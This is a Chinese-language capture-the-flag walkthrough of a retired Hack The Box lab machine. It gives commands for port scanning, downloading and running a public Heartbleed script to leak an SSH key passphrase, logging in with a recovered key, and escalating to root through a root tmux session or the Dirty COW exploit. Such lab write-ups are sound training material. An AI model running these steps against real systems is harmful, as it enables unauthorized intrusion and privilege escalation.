基础信息
简介:Hack The Box是一个在线渗透测试平台。可以帮助你提升渗透测试技能和黑盒测试技能,平台环境都是模拟的真实环境,有助于自己更好的适应在真实环境的渗透
链接:https://www.hackthebox.eu/home/machines/profile/127
描述:
注:因为是已经退役的靶机所以现在的ip地址与信息卡中的并不一致。
前言
本次演练使用kali系统按照渗透测试的过程进行操作,首先对该靶机进行探测,获取端口与版本信息根据各个开放端口的版本,在使用nmap的–script=vuln 参数查找常见的漏洞,利用漏洞获取相应权限最终进行提权。
一、信息收集
1、靶机ip
IP地址为:10.129.1.190
2、端口与服务
nmap -sV -A -Pn -O 10.129.1.190
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
443/tcp open ssl/http Apache httpd 2.2.22 ((Ubuntu))
3、网站信息收集
进入80端口查看网站信息,通过查看前端源码,没有发现可利用信息
使用dirsearch进行目录扫描
发现http://10.129.1.190/dev/
进入目录发现两个文件,在之后的渗透中可能会有用
二、漏洞探测与利用
1、查询常规漏洞
nmap --script=vuln -sV -Pn 10.129.1.190 -p 443
发现可能存在Heartbleed漏洞,使用sslyze进行验证查看是否真的存在
2、漏洞利用
(1)使用谷歌查询可使用脚本将其下载到kali中
git clone https://gist.githubusercontent.com/eelsivart/10174134/raw/8aea10b2f0f6842ccff97ee921a836cf05cd7530/heartbleed.py
wget https://gist.githubusercontent.com/eelsivart/10174134/raw/8aea10b2f0f6842ccff97ee921a836cf05cd7530/heartbleed.py
python2 heartbleed.py 10.129.1.190 -p 443
可以清楚地看到一串字符串
经过解码获取明文信息
明文:heartbleedbelievethehype
(2)获取加密私钥
之前在进行信息收集时获得了http://10.129.1.190/dev/
进入hype_key发现是16进制加密的秘钥
将其解密
链接:https://www.rapidtables.com/convert/number/hex-to-ascii.html
将其解密的内容写入文件
并赋予权限
vim hype.key
file hype.key
chmod 777 hype.key
(3) ssh远程连接
根据收集的信息
我们已有
可能的密码:heartbleedbelievethehype
秘钥: hype.key
以及可能的用户:hype
尝试进行连接
ssh -i hype.key [email protected]
三、提权
方法1
使用LinEnum.sh进行信息收集
查看bash历史文件
发现可以执行tmux回话
执行ps -ef | grep root 显示所有内容
执行该命令进行提权
方法2
脏牛提权
链接:https://github.com/FireFart/dirtycow/blob/master/dirty.c
将该文件下载到/tmp下执行并进行编译
执行脚本进行提权
提权成功
来源:freebuf.com 2021-02-28 17:37:29 by: WAFmax
请登录后发表评论
注册